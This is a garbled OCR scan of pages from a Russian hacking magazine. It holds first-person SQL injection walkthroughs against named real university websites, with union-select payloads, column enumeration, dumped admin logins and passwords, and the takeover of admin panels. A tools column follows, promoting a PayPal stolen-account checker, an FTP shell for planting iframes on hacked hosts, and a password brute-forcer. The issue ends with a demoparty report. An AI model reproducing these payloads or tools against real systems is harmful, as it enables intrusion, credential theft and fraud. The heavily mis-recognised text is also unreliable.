Интереса ради была просмотрена версия Оракла: 

ЬРСр : / /пеѵѵзсіезк . итб . еби/ипііпі/геіеазе . сбт?АгСіс1еІВ=- 
1 ипіоп зеіеск пиіі ,Ьаппег ,пи11 ,пи11 ,пи11 бгот ѵ$ѵегзіоп 

Ріа это я получил: 

СОКЕ 9 . 2 . О . 7 . О 

По ранее полученной ошибке мы видим, что использовать комментарии 
(«--») не нужно. Дальше было получено имя пользователя БД(45ЕРѴІСЕ), 
находящееся в таблице аІІ_изегз: 

ЦагдеД/геІеазе . сбт?АгЬіс1еІВ=-1 ипіоп зеіесб 1,пи11,пи1 
1 , пиіі , изегпаше бгот а11_изегз 

Затем было решено пройтись потаблицам. Их названия хранятся в систем- 
ной таблице изегДаЫез^уз.изегДаЫез) и в таблице зуз.аІЦіаЫез. 

Был сделан следующий запрос: 

багдеб/геіеазе . сбт?АгЬіс1еІВ=-1 ипіоп зеіесб 
1 ,пи11 , пиіі ,пи11 , ЦаЫе_паше Тгош изег_ДаЫез 

В ответна это сервер выдал название первойтаблицы — АРТІСІ_ЕІЫРО. 
РІазвания всех колонок находятся в таблице изег_1аЬ_со1итп5(зу5. 
изег_1аЬ_со1итп5). Простая инъекция выдала мне первую колонку(АС): 



РагдеР/геІеазе . сбт?АгСіс1еІВ=-1 ипіоп зеіесб 
1 , пиіі ,пи11 ,пи11 , со1ишп_паше ігош изег_ДаЬ_со1ишпз 

В данном случае мне очень повезло — в сообщении об ошибке была 
исчерпывающая информация и о количестве выбираемых колонок и о 
типе данных. Ріо не всегда все оказывается так просто. Подбирать колонки 
в Оракле можно, тупо подставляя нули (пиіі, пиіі, <...>), или использовать 
оператор огсіег Ьу: 

К примеру: 

ДагдеР/геІеазе . сбт?АгСіс1еІВ=-1 огбег Ьу 5 
Сервер выдает: 

Страница сайта без динамического содержимого . 

Ошибки нет, следовательно, столбцов 5 или более пяти. 

Тогда: 

ЬагдеЬ/геІеазе. сбт?АгЬіс1еІВ=-1 огсіег Ьу б 
Ріа выходе получаем: 

Еггог ЕхесиЬіпд ВаРаЬазе Оиегу. 

[Масготебіа] [Огасіе 6ВВС Вгіѵег] [Огасіе] ОКА-01785 : 
ОКВЕК ВУ іСегп шиз б Ье Ыіе пигпЬег об а 5ЕЬЕСТ-1ізЬ 
ехргеззіоп 

Появилась ошибка, следовательно, всего 5 колонок. 

в подзапросы 

Выбирая названия таблиц и колонок из системной таблицы, мы получали 
лишь имена первыхтаблиц/колонок. Для того чтобы вытащить остальные 
названия, используются подзапросы с оператором гоѵѵпит. Я составил 
такой запрос: 

Дагдеб/геіеазе . сбт?Агбіс1еІВ=-1 ипіоп зеіесб 
1 , пиіі , пиіі , пиіі , РаЫе_пате бгот (зеіесб гошиш г , 
ДаЫе_паше бгот изег_баЫез) ѵйіеге г=2 

Такбыло получено название второйтаблицы в базе данных — С0ЫТАСТ5. 
Перебирая значения оператора гоѵѵпит — г, мы получим названия осталь- 
ныхтаблиц. Аналогично вытаскивается информация о колонках: 

РагдеЬ/геІеазе . сбт?АгРіс1еІВ=-1 ипіоп зеіесб 
1 , пиіі , пиіі , пиіі , со1итп_пате бгош (зеіесб гоѵѵпит г, 
с о 1 итп_пате бгот изег_РаЬ_со1ишпз ) ѵбіеге г=2 



ХАКЕР 10 /106/ 07 



► 081 




взлом 




Тема программиро- 
вания на СоІсІРизіоп 
достаточно инте- 
ресна, и я советую 
тебе ознакомиться с 
некоторыми доками: 
сіид.ги — россий- 
ская группа пользо- 
вателей СоІсІРизіоп. 
еазусітсот — от- 
личный сайт по С РМ. 
Огромное количест- 
во туториалов. 
асіоЬе.сот/ргосІисІз/ 
со^іизіод — домаш- 
няя страница СР. 
ѵѵтазіюг.ги/ 
со[сІІ : и5Іоп/ргі[оЗ.Ы:т 
— функции СРМІ_. 







> ІП^О 

При любых подобных 
экспериментах 
взломщик не должен 
забывать о своей 
анонимности. Даже 
самые безобидные 
действия, произво- 
димые над серве- 
ром, могут привести 
к встрече с сотруд- 
никами известных 
органов. 




> СІѴСІ 

Ріа дискеты найдешь 
видеохак, демонст- 
рирующий весь про- 
цесс издевательств 
над буржуйским 
Мэрилендом :). 

Там же находится 
небольшой шелл, 
написанный на СРМ. 




іагдеі/геіеазе . сітРАгіісІеІБ—І ипіоп зеіесі 
1 , пиіі , пиіі , пиіі , со 1итп_паше Тгош (зеіесі 
гоѵтпиш г, со1ишп_паше Тгош изег_іаЪ_со1итпз) 
ѵ/кеге г=3 

И так далее. 

Естественно, подзапросы применимы и для остальных 
системныхтаблиц. К примеру, мы можем получить имена 
остальных пользователей: 



кіір: //петсзсЗезк.итсІ. есіи/сиііиге/геіеазе . 
с:Ет?Агііс1еІВ=-1 ипіоп зеіесі пиіі ,пи11 ,пи11 , 
пиІІДодіп ігош Іодіпз 

Вторым же запросом я достал пароль (1 1 777): 

кіір : / /пеѵ?зс1езк . ишсЗ . есіи/сиііиге/геіеазе . 
сітРАгіісІеІБ—І ипіоп зеіесі пиіі , пиіі , пиіі , 
пиіі , раз зѵгогсі ігош Іодіпз 



кіір: / /пемзсіезк.итсі. есіи/ипііпі/геіеазе . 
с:Ет?Агііс1еІВ=-1+ипіоп+зе1есі+пи11 ,пи11 , 
пиіі , пиіі ,изегпате+:Егот+ (зеіесі гошгит г, 
изегпаше ігот а11_изегз) ѵЛіеге г=2 

кіір: //пеѵ/зсіезк.итсі. есіи/ипііпі/геіеазе. 
сіт?Агііс1еІВ=-1+ипіоп+зе1есі+пи11 ,пи11 , 
пиіі , пиіі ,изегпаше+ігот+ (зеіесі гоѵтит г, 
изегпаше ігот а11_изегз) ѵгііеге г=3 

Дальше просто пошел перебор значений г. Ты уже наверняка 
задался вопросом: «А какже пароли юзеров?» Ксожалению, у 
меня не хватило прав для их просмотра. 

Предполагая местонахождение админки, я перешел по адресу 
ЬНрѴ/пемзбезк.итсІ.есІи/іодіп и увидел листинг директории 
Іодіп: 



Дальше были использованы подзапросы для выуживания 
остальныхакаунтов: 

кіір: //пемзсіезк.итсі. есіи/сиііиге/геіеазе. 
сііп?Агііс1еІВ=-1 ипіоп зеіесі пиіі , пиіі , пиіі 
, пиіі, Іодіп ігот ( зеіесі гоѵтпит г, Іодіп ігот 
Іодіпз) икеге г=2 

кіір : / /пеѵ/зсіезк . итсі . есіи/сиііиге/геіеазе . 
сіт?Агііс1еІВ=-1 ипіоп зеіесі пиіі , пиіі , пиіі 
, пиіі , раз зѵгогсі Тгош(зе1есі гоутпитг, раззѵгогсі 
Тгош Іодіпз) мкеге г=2 

Остальные акки доставались аналогично. 

Аккаунтов оказалось всего пять. Вотони (I — Іодіп, р 
— раззѵѵогсі): 



Арріісаііоп. сіт 
Ъоііош. сігп 
Іодіп . сіш 
1одіп_асііоп . сіш 
іор_1одіп. сіш 



01-Аид-2003 10:45 250 
10-Вес-2002 13:17 1.7К 
01-Аид-2003 10:45 461 
01-Аид-2003 10:45 701 
16-Вес-2004 12:02 5 . 8К 



1 : 4а<3тіп 
р: до4іегрз 

1 : ѵіпсе 
р: ікашап 



Очередная типичная ошибка при конфигурации 
СоІсІРизіоп. Арріісаііоп.сіт — это конфигурацион- 
ный файл, своего рода шаблон, который определяет 
выводимую при ошибке информацию. За вход в админку 
отвечал файл Іодіп. сіт. Обратившись напрямую кфайлу 
іодіп_аскоп.сіт, я получил очередной подарокот 
системы: 

Тке еггог оссиггесі іп /аіз/ . діие.итсі.есіи/ 
сіер аг ітепі / о і і / е і з / ѵ/еЪко з і і пд / пеѵ/з сіе з к / 
кісіосз/ Іодіп/ 1одіп_асііоп. сіт: Ііпе б 

4 : ЗЕЬЕСТ Соипі ( * ) АЗ Ьодіп_Маіск 

5 : РВОМ ЬОСШЗ 

6 : ѴШЕКЕ ЬООІЫ = ' #Рогш . Ьодіп# ' 

7 : АШЭ РАЗЗѴГОКВ = ' #Еогш. Рѵ/й# ' 

8 : </СЕОІІЕКУ> 

Теперь я имел все, что только могло понадобиться: названия 
нужных колонок и таблиц. 

Первый запрос выдал мне адми некий логин (4асІппіп): 



1 : кегЬо 
р: 11777 

1 : піек 
р: 187 

1 : асЗшіп 
р: до4іегрз 

^ ЗАНАВЕС 

Попав в админку, такую же убогую, как и весь сайт, я 
добавил новость с приветом всем посетителям. Сначала я 
даже стал вставлять в новости привычную строку «<?рбр 
зу5іе т ( і сі ) ?>», но быстро вспомнил, с какой системой я 
работаю :). 

Народная мудрость «Не знаешь — не лезь» в очередной раз 
подтверждалась. Создатели портала совершенно не подни- 
мали вопрос безопасности при программировании на СЕМЕ. 
Всегда нужно отдавать предпочтениетем технологиям, в 
которыхты разбираешься. 
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На сервере этого сайта крутилось множество других порталов, которые 
были не менее бажными. Получить права на них оказалосьтакже просто, 
как и на рассмотренном пеѵѵзсіезк.иппсі.есіи . 

В ГЕРЦЕН Ѵ5 РЕО МІІ5ЮІЕ 

Лето пролетело незаметно, и пора было снова задумываться об учебе. О 
чем бы я не думал, мыслями я неизбежно возвращался куниверситету. И 
тут как раз подвернулась статья РОісГа. Прочитав августовский «Хакер», ты 
наверняка бросился ломать любимый университет :). У тебя получилось? У 
меня — да. Моей целью был Российский государственный педагогический 
университетимени А. И. Герцена. 

Зайдя на сайт, я был приятноудивлен приветливым дизайном. Мне 
предлагали на выбортри входа: общий, для студентов и для абитуриентов. 
Недолго думая я нажал «Общий». Первым делом я заглянул в гоЬоіб.Ш, но 
тутменяждал облом: 

Бзег-адепГ: * 

Бізаіісш: / 

Вот и все, что я смогувидеть. Ничуть не расстроившись, я двинулся 
дальше. На ресурсе были ссылки на сайты структурных подразделений и 
личные сайты сотрудников, но их я оставил на потом, занявшись глав- 
ным сайтом. Панели авторизации видно не было, поэтому я перешел к 
поиску 50 1_- инъекции. Я подставил кавычку в первую попавшуюся ссылку 
П~іир://ѵѵѵѵѵѵ.Ьег2еп.5рЬ.ги/іпсІех.рб1:т[?ісІ=1 ' ). и произошло нечто странное. 
Меня перекинуло на страницу іпсіех. рЫ:тІ?ісІ=1 343, а посредине страницы 
висело окошко авторизации :). Я подставил кавычку в поле «Логин», и 
сервер выдал мне ответ: 

БВ Еггог : зупГах еггог 

ЗЕБЕСТ изегпаше, раззѵгогсі РКОМ изегз ШЕКЕ изегпаше = 

' ' ' АЫБ зГаГе = ' 0 ' [паГіѵесосІе ::: 1064 ** Уои Баѵе ап еггог 
іп уоиг ЗОБ зупГах; сБеск ГБе шапиаі ГБаГ соггезропсіз 
ко уоиг МуЗСЭБ зегѵег ѵегзіоп Гог ГБе гідБГ зупГах Го изе 
пеаг ' 0 ' ' аГ Ііпе 2] 

Я не поверил своим глазам. С крипт все сделал за меня.теперьязнал 
название базы и имена столбцов. Но как я ни изгалялся, мои запросы 
не выполнялись. В итоге, бросив эту затею, я стал искать другие 
инъекты. 

^ ПОЖИНАЕМ ПЛОДЫ 

После недолгих поисков я наткнулся на очередной инъект: 

БГГр : //ѵпот7.Ъег2еп. зрЬ. ги/іпсіех.рБГт1?ісЗ=1343&:пе\л73_ 
ісі=793 1 &Ыоск=5 

Сервер опять же ответил мне максимально информативно: 

БВ Еггог : зупГах еггог 



ЗЕЬЕСТ * ЕКОМ пеѵ/з ШЕКЕ ісі = '793 ' ' [паГіѵесосіе=1064 ** 
Уои Баѵе ап еггог іп уоиг ЗОБ зупГах; сБеск ГБе шапиаі 
ГБаГ соггезропсіз Го уоиг МуЗ()Е зегѵег ѵегзіоп Гог ГБе 
гідБГ зупГах Го изе пеаг ' '793 ' ' ' аГ Ііпе 1] 

Используя ипіоп и информацию, полученную из предыдущего запроса, я 
сформировал такой запрос: 

БГГр:/ / Ѵ7\л7\л7 . Бег 2 еп . зрЬ . ги / іпсіех . рБГшІ ? і<і= 1 3 4 3 &пемз_і <3. 
=793' +ипіоп+зе1есГ+изегпаше , раззѵгогсН-Ггот+изегз / *&Ы 
оск=5 

И получил долгожданный ответ: 

БВ Еггог: ипкпоѵтп еггог 

ЗЕБЕСТ * РВОМ пемз ШЕКЕ ісі = '793 ' ипіоп зеІесГ 
изегпаше, раззѵгогсі Ггош изегз/* ' [паГіѵесосіе=1222 ** 

ТБе изесі ЗЕБЕСТ зГаГешепГз Баѵе а сііГГегепГ пишЬег оГ 
соіишпз] 

Осталосьтолько подобрать количество столбцов, чем я и занялся. В итоге 
запрос приобрел вид: 

БГГр : //Беггеп. зрЪ. ги/іпсіех.рБГш1?і(і=14&пе™з_і(і=793 ' +и 
піоп+ЗЕБЕСТ+1 ,2,3,4,5,6,7,8,9,10,11,12,13, 14+РКОМ+изе 
гз+ШЕКЕ+изегпаше%20 = %20 ' ' %200К%20 ' 1 1 = ' 1 ' /*&Ыоск=5 

Запросуспешно выполнился, и ничего не произошло — передо мной снова 
была страница новостей. Но после 1 0-секундного ступора я понял, где 
накосячил, и поставил «-» перед номером ісі. После нажатия на <Еп1ег> 
с экрана на меня приветливо смотрели цифры 5, 7 и 1 1 . Окончательный 
запрос выглядел так: 

БГГр : / /Беггеп . зрЬ . ги/ іпсіех . рБГшІ ?ісІ= 14 &пеѵ73_ісІ=- 
793 ' +ипіоп+5ЕЦЕСТ+1 ,2,3, 4 , изегпаше , 6 ,раззж>гсі, 8,9, 
10,11,12,13, 14+РКОМ+изегз+ШЕКЕ+изегпате%20=%20 ' ' % 
200К%20 ' 1 ' = ' 1 ' /*&Ыоск=5 

Таким образом я получил логин и пароль администратора: 

Бодіп: піск 
Разз: піскусБ 

Пароль заставил меня невольно улыбнуться :). Теперь мне предстоял 
поиск админки, который много времениуменяне отнял, так как админ- 
ка располагалась по адресу Шр://беггеп.5рЬ.ги/ас1тіп . Введя полу- 
ченные данные, я попал в святая святых сайта. И тутже упал под стол 
— система меня приветствовала фразой: «Здравствуйте, КоЬіІуаізку 
N і коіа і ЫікоІаеѵісЫ» :) Время было позднее, шелл заливать было лень, 
и я решил довольствоваться тем, что стал админом на сайте :). т 
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Программы для хакеров 



А ПРОГРАММА: РАѴРАЮНЕСКЕР: 
ОС: УІІЧ/*[ЧІХ 
АВТОР: 0 _ 0 ТЫНЦ 



-= ЗНІТ 



Р -Ш-ІП 

«Ч СР *і 






|Чекаем аккаунты в РауРа і| 



Прежде чем я начну описывать «гвоздя 
программы» сегодняшнего выпуска Хйооіз, 
хотелось бы передать привет ребятам из заме- 
чательной конторы РауРаІ и сообщить им, что 
ни я, ни редакция ни в коем случае не собира- 
емся наносить какой-либо урон их бизнесу. Я 
бы мог еще долго говорить на эту тему, делая 
миролюбивые заявления, но объем рубрики 
слишком скромен для лирики :). Поэтому плавно 
переходим ктулзе. Утила, ради которой мне 
пришлось потратить несколько строктекста на 
обращение к а мерам (да не убьет меня редак- 
тор], выполнена исключительно в приватной 
версии и не подлежит распространению. 
Называется она просто: РауРаІСЬескег :]. Вот 
только чекер не совсем обычный и, я бы даже 
сказал, волшебный. Поэтому сразу перейдем к 
его особенностям: 

• наличие авторизации (чтобы никто 
не увел тулзу из-под твоего 
контроля) ; 

• функция фильтрации акков, которые 
уже были однажды прочеканы, эконо- 
мящая немало времени; 

• поддержка смены механизма 



парсинга : к чекеру подойдет любой 
формат логов (требуется лишь напи- 
сать класс для парсинга) ; 

• гибкий механизм выбора соксов: 
носок подбирается из списка так, 
чтобы быть максимально похожим на 
ІР -холдера аккаунта; 

•удобная соке -админка плюс чекер 
соксов (отображает не только живые 
сосксы, но и их местоположение, 
пропускную способность канала и 
т . д . ) ; 

• возможность постить Ьапк іпГо для 
трансферов ; 

• полный лог прочеканных акков; 

• вместе с проверкой пары логин/па- 
роль получается дополнительная 
информация об аккаунте : баланс , 
лимит вывода , тип и т . д . 

Отхакера требуется лишь залить РауРаІСЬескег 
на свой купленный/поломанный/приватизи- 
рованный сервер и единожды его настроить. 

Как и куда выставить чмоды, можно прочитать 
в геебте ксофтинке. Отмечу только, что для 
успешной работы тулзы потребуется наличие 
РНР >= 5.0.0 и сІ)РІ_ >= 7.10. Кроме того, нужно 
помнить, что чекер не работает с файлами 
логов, размер которых превышает2 Гб, поэтому 
иногда имеетсмысл скормить ему несколько 
кусочков по отдельности :). В целом утила не- 
прихотлива в использовании, разве что следует 
периодически вычищать папки ./зузІет/сасЬе 
и ./зузіет/ззп (в которых хранятся устаревшие 
куки и прочий хлам). 

Р.5. Чекер написан целиком на РНР, поэтому 
соответствующие знания позволят тебе модер- 
низировать его, кактебе вздумается (только не 
забывай об истинном авторе скрипта). Тем не 
менее учти, что за все противозаконные дейс- 
твия ты несешь ответственность 



самостоятельно, а РауРаІСЬескегя выложил на 
диск исключительно для ознакомления. 

^ ПРОГРАММА: РТР 5 НЕІ± VI . 5 
ОС: ѴІН/*МІХ 
АВТОР: СЕНОМ 

Я довольно часто выкладываю в Хйооіз све- 
жие версии различных веб-шеллов, но в этот 
раз я сделаю исключение. Я расскажу о скрип- 
те Йр зЬеІІ, который целиком и полностью 
написан на Регі. Изначально скрипт предна- 
значался для удобной работы с РТР-аккаунтами. 
Что подразумевается под этой самой «работой», 
полагаю, пояснять не нужно :). Поэтому перей- 
дем непосредственно к описанию наворотов 
утилы и к ее применению. Сразу отмечу, что 
наибольшая эффективность этого скриптика 
достигается при применении его в качестве 
чекера РТР-акков. Кроме того, с его помощью 
ты всегда сможешь лицезреть состояние 
РТР-директорий на нескольких серверах 
одновременно (особенно это заманчиво при 
установке ифреймов на поломанные хосты :)]. 

В общем, все, что требуется в повседневной 
рутине с РТР-аккаунтами, Йр зЬей делает, и 
делает хорошо. 

Внешне менюшка софтинки разбита на 4 части. 
Первая содержит в себе непосредственно РТР- 
акки формата: 

1. Гбр: / /1одіп:развж)гсІ@зегѵег 

2. ІодіпграззѵгогсШзегѵег 

Ты выделяешь необходимые акки, нажимаешь на 
кнопку, и скрипт коннектится куказанным РТР- 
серверам. Причем акки можно не вбивать ручками, 
а залить на серв в файле с именем дооб_Йр.Ъй. 
Послетого ка к тулза установит соединение с 
РТР-сервером, тебе будут доступны следующие 
функции: 
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ир — переход в предыдущую папку; 
коте — переход в корневую папку; 
с3.е1 бііе — удаление выделенного 
файла ; 

сІе1 сііг — удаление папки; 
шк с! іг — создание каталога (созда- 
ется в текущем каталоге с именем, 
указанным в поле «Ыето паше бог 
гепаше & шк сііг») ; 
гепаше — переименование выделенно- 
го файла (название задается в поле 
«Ыето паше бог гепаше & шк сііг») ; 
заѵе — без комментариев : ) . 

Также есть возможность редактирования файлов 
(какуже писалось выше, например, для вставки 
ифреймов). Единственный минус — скрипт не ото- 
бражает русский текст, но, я думаю, твоим глазам не 
привыкать к 005-кодировке? Послетого какты про- 
ифрей... то есть «отредактировал» нужный файлик, 
следует выбрать одно из следующих действий: 
заѵе — просто сохранить файл; 
заѵе & ІоасІ — сохранить и загрузить измененный 
текст на сервер; 

ІоасІ опіу — только загрузить файл на сервер. 
Одним словом, опций хватает — было бы что 
ч екать :). А где достать РТР-аккаунты, я тебе го- 
ворить не стану, это ктеме не относится. Поэтому 
сливай скрипте нашего ОѴй и вперед! 



^ ПРОГРАММА: ТНСНѴЕЖА 5.4 
ОС:*ШХ 

АВТОР: ТНС 
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Сайт создателей Гидры — ТНСТеат 



О том, что такое Гидра, знает каждый. Этот 
мощнейший брутер с огромным количеством 
настроек и опций далеко не всем покоряется с 
первого раза :). Именно поэтому на нашем ОѴР 
я выложу свежую версию софтины, а в рубрике 
черкану пару строк об инсталляции и прируче- 
нии этого диковинного зверя :]. 

Начнем стого, что Гидра умеет брутить (а умеет 
она практически все): ТЕІ_ЫЕТ, РТР, НТТР, 
НТТР5, НТТР-РРОХУ, 5МВ, 5МВІЧТ, М55СН_, 
МуБСИ, РЕХЕС, Р5Н, РЕ0ѲІІ\1, СѴ5, 5ЫМР, 
5МТР-АІІТН, 50СК55, ѴГ1С, РОРЗ, ІМАРит.д. 
Кстати, брутит и 55Н, но для этого требуется 
наличие библиотеки ІіЬззЬ. О том, как настро- 
ить Гидру, уже писалось на страницах нашего 
журнала (читай подшивку ][), но коротко этот 
процесс я все же опишу (далее — последова- 
тельность команд в никсах): 

1. тодеб кббр: //бгеетоогіеі. Ыіс .огд/ 

<іотоп1оасі.р1ір?б=г&б=Ь.усІга-5 .4-згс . 

баг.дг //сливаем архив с сервера ТНС 



2. Саг 2 хѵ Г Ьусіга-5 . 4-згс . баг . дг 
//распаковываем архив 

3. гш -гб кусіга-5 . 4-згс . Саг . дг // 
удаляем архив 

4. ссі ЬусІга-5 .4-згс //переходим в 
каталог с Гидрой 

5. . /сопбідиге 

6 . таке 

7. шаке іпзСаІІ 

Все предельно просто и понятно, чего не ска- 
жешь об опциях брутера, которых великое мно- 
жество. В качестве примера приведу несколько 
основных функций: 

-К. — восстановление сессии после 
сбоя; 

-е пз — проверка наличия пустого 
пасса и пасса, равного логину; 

-С РІЬЕ — брут из файла с записями 
вида логин : пароль ; 

-о РІЬЕ — вывод результатов работы 
в файл; 

-Г — завершение брута после первой 
найденной пары логин : пасс; 

-С ТАЗК5 — количество потоков; 

-то ТІМЕ — тайм-аут (30 секунд по 
дефолту) . 

Ну разве не чудо? Кстати, это лишь малая 
часть всех фичей, остальные, надеюсь, ты 
освоишь самостоятельно. В этом тебе помо- 
жет и стандартный мануал (после установки 
брутера набери в консоли «./Ьусіга», одним 
словом, ВТГМ :)). Затруднений возникнуть 
не должно, но если что — мое мыло всегда к 
твоим услугам :). 



А ПРОГРАММА: ЗРѴВОТ-ЗЕАРСН&ОЕЗТКОѴ 
VI .5 

ОС: УІГС'ОѴЗ 2000/ХР/ѴІЗТА 
АВТОР: ЗАРЕР ІЧЕТУОККІІЧС ПО 




В наше время шпионским ПОуже никого не 
удивишь. Холодный и расчетливый мир капита- 
лизма то и дело пытается впарить тебе очередную 
гадость. И неважно, будь то Абѵѵаге/Кеуіоддег/ 
РооіКіЕ или что-то еще, факт остается фактом 
— минимум неприятно :). Поэтому постоянные 
поиски универсального инструмента для обнару- 
жения и удаления разнообразной зруѵѵаге-нечес- 
ти порядком поднадоели. Да и надобность в них 
отпала, поскольку появился вполне приличный 
(фриварный, с поддержкой более 40 языков, 
включая русский) софт — ЗруЬоІ-ЗеагсЬ&ОезІхоу. 



По названию нетрудно догадаться, что делает 
тулза. Да-да, находит объект шпионского ПО и 
коварно расправляется с ним (о чем свидетельст- 
вует словосочетание ЗеагсЬ & Оезігоу:)). Работает 
утила исключительно под Виндой, причем есть 
поддержка ѴѴіпсіоѵѵзѴізІа (брр-р-р :)). Красивый 
гуишный интерфейс делает процесс поиска и 
удаления «недоброжелательных элементов» 
достаточно приятным и забавным мероприятием. 

В общем, описывать тут нечего — надо юзать :). Тем 
более что за применениетулзы авторы нетребуют 
ни цента, а злые дяди из отдела «К» не привлекут 
тебя куголовной ответственности по статье за 
использование нелицензионного ПО :). 

Р.5. Кстати, настоятельно рекомендую юзать ЗруЬоІ- 
ЗеагсЬ&ОезІгоу в комплекте с антивирем (каким 
— делотвое), тогда ни одна зараза не скроется в 
дебряхтвоейоси :) 



4 ПРОГРАММА: ТОТАІ. РРІѴАСѴ 5.31 
0С:У№0УЗ 2000/ХР 
АВТОР: РОІИТЗТОІЧЕ ЗОЕТУАРЕ 




А ну-ка, скажи мне, сколько раз вденьты чистишь 
куки/хистори/логи и прочий хлам, способный 
выдать тебя с головой? Соглашусь стобой, что 
занятие это довольно нудное. В свое время я даже 
писал РНР-скрипт, который после запуска очищал 
отхистори-файлов каталоге крысой, удалял 
куки браузера и не помню, что еще :). Кстати, для 
этого сгодится даже обычный бабник, с набором 
консольных команд. Но работать с таким убожест- 
вом неприятно, неудобно и неэффективно. И вот 
почему: 

1 .Желательна автоматическая очистка всего и везде. 

2. Нужна поддержка нескольких браузеров, 
нескольких ІСО-клиентов и т.д. 

3. Требуется работа по расписанию (плюс график 
заданий). 

Однако не все так плохо, поскольку все выше- 
перечисленные пункты реализуются втулзе под 
названием Тоіаі Ргіѵасу. Поверь, с этой утилой 
ты сможешь спать гораздо спокойнее. Нет, тебе 
не предложат инсталлировать бронированную 
дверь в квартиру или решетки на окна, все гораз- 
до скромнее :). Достаточно лишь запустить прогу, 
настроить график заданий — и дело в шляпе! 
Никаких лишних кукисов, темповых файлов, 
историй и прочего геморроя, никаких и нигде 
:). Этом, как это важно при экспертизе изъятого 
компа, я и говорить не буду. Поэтому незамедли- 
тельно копируй утилу себе на винт, инсталлируй, 
настраивай и запускай. И помни: все будетхоро- 
шо, по крайней мере хуже уже не будет :).ЗС 
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То, что у нас в России самые крутые компьютерщики в мире, обсуждению не подлежит. 
А компьютерщики, они хоть на компах и повернуты, но общаться только в рамках око- 
шечек ІС(^- и ІКС-клиентов не могут. Наш ответ всем заморским хакатонам и АззетЫеу 
— фестиваль СЬаоз СопзНисйош. 



В ДЕНЬ ПЕРВЫЙ. НАЧАЛО 

Впервые подобная тусовка прошла в Питере в 1995 году. Искушенные 
читатели знают, что тогда она еще именовалась ЕпЫдЫ. На первое русское 
демо-пати собралось около двухсот человек, а помещение предоставляла 
Федерация шейпинга. Кстати, многие из команды организаторов 1995 года 
работают в оргкомитете и сегодня. 

В этом году фестиваль проходил в торгово-выставочном комплексе «Ев- 
разия» втечение двух дней без перерыва. Полное название пати — Сбаоз 
Сопзігисбопз Апбдие, последнее слово отражает лозунг фестиваля: 
«Возвращение к истокам». Дело втом, что организаторы обещали самую 
большую выставку старых компов за всю историю проведения СС. 

В общем, в 10 утра 25 августа я уже выходил из станции метро «Лесная» 
и, огибая лужи, двигался к«Евразии». Наканунелил дождь, но сегодня 
небо было чистым, синим и радостным, призывая компьютерщиков не 
сидеть дома. Торговый комплекс найти было легко — он находится в пяти 
минутах ходьбы от метро, а над входом в эти дни красовался большой щите 
надписью: «СС’2007». У входа уже стояло человек 1 5, распивавших главный 
программерский напиток — пиво. Пара минутушла на диалоге админист- 
рацией («Я из «Хакера», господа. Да, мне очень нужно внутрь до открытия. 
Нет, понимаете...»). Ситуацию спас Петр Соболев ака Егод — глава оргко- 
митета. Он провел меня в зал и дал входной билет — ленточку-браслетик 
со штрихкодом, которую так критиковали впоследствии участники. Дело в 
том, что каждый раз, когда ты входил или выходил из зала на улицу, админ 
возле дверей «щелкал» штрихкод специальным устройством. Мало того что 
ощущаешь себя банкой пива в продуктовом магазине, так еще и очередь 
иногда образовывается! Тем, кто пришел без компьютера, клеили красные 
браслетики (цена за вход была 400 рублей), с ноутбуком — шахматную 



ленточку, и вход на фестиваль с компом был в 2 раза дешевле. Девушек по 
традиции пропускали бесплатно. 

Зал сразу порадовал своими размерами — отесноте можно было не волно- 
ваться. Центральный проектор, на котором транслировались конкурсные 
работы, был достаточно большим, и даже с последних рядов изображение 
выглядело четким. В зоне участников стояли столы и стулья в несколько 
рядов, подними валялисьудлинители и прочие провода — проблем с под- 
ключением ноутбука не наблюдалось. В другой части зала находилась хак- 
зона — там эти два дня жил Адгеззог, ответственный за конкурс по взлому, и 
там же, прямо в зале, располагался буфет, чтобы можно было подкрепиться, 
не уходя далеко. Напротив центрального проектора находилась выставка 
старых компьютеров — она действительно занимала много места, и экспо- 
натов в ней было порядка 80. За инфодеском уже работали очаровательные 
девушки, «готовые ответить на любые мои вопросы». Спрашивать я их ни о 
чем серьезном не стал, благо расписание событий фестиваля находилось 
тутже, зато пообщался с удовольствием. Что касается интернета: везде в 
зале было покрытие ѴѴі-Рі, для тех, у кого не было карточки для беспровод- 
ного выхода в сеть, было отведено специальное место с витой парой. 

По залу бегали организаторы — кстати, почти 40 человек — и решали 
оставшиеся проблемы. С небольшим опозданием, после 1 1 утра, начали 
запускать народ. 

г ДЫХАНИЕ А55ЕМВІ-ЕѴ И ВЕЧНЫЙ 2Х 

С самого утра в зале порядка 200 человек, причем как минимум половина 
пришла с ноутбуками. Учитывая, что в комплексе было нарочито полутемно, 
для того чтобы изображение проекторов было четче, вокруг все светилось 
от ЕСй-мониторов. 
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На сцену поднялись Ргод и Напсіот — организаторы. Традиционная привет- 
ственная речь, рассказ отом, чего стоит ждать, как подключиться ксети, и 
прочем. За спиной Ргод’а постеры со спонсорами: «Объединенные сети» 
обеспечивают ѴѴі-Рі, а АбРіѵег снабжает победителей призами. 

Фестиваль объявлен открытым. Кстати, если говорить о спонсорах, то 
основные затраты на проведение пати — личные средства организаторов. 
Аренда помещения, охрана, оборудование. Выручка с входных билетов 
окупает лишь малую часть затрат. 

Ріа большом экране начинают крутить репортаже АззетЫеу — демо- 
пати, которое проводится в Хельсинки и считается самым масштабным 
компьютерным фестивалем. Грандиозные кадры стысячами мониторов 
были призваны растравить душу посетителей СС. Пока юзеры подключали 
свои ноуты ксети и ловили ѴѴі-Рі ксвоим фряхам иубунтам (юниксоидов 
былотрадиционно много), на экранетранслировались лучшие работы с 
АззетЫеу. Справедливости ради надо заметить, что хотя выполнены они и 
покруче представленных на СС, но отнюдь не в разы. Человек, который «не 
в теме», сразу и не поймет, где забугорные демки, а где родные. 

В этой статье я не буду подробно описывать работы фестиваля. Во-пер- 
вых, демо, в отличие от художествен но го фильма, не содержит сюжета, и 
объяснить в двух словах, что там происходит, тяжело. Я расскажу тебе об 
атмосфере фестиваля. Работы же ты можешь найти на диске. 

Первым конкурсом стал 2Х5рес1:гит (не забудем мать родную, ребята!) 
ѲгарЬісз. Художники на 2Х блеснули психоделичностью и кровожадностью, 
изобразив персонажей компьютерных игр, зверушек и некоторые объекты 
воображения, причем, что собой являют последние, я не понял. Рисование на 
Спектруме оказалось распространенной забавой — во время фестиваля про- 
водилось еще два подобных реалтайм-конкурса. Реалтаймовыми называются 
такие конкурсы, работы для которых создаются за ограниченное время непо- 
средственно на фестивале и участвовать в которых может каждый желающий. 
Тутже проводилось голосование. При входе на фестиваль каждому давали 
стопочку анкет для голосования. Записав буквенный индикатор с брасле- 
тика-билета и расставив оценки работам, участник должен был занести 
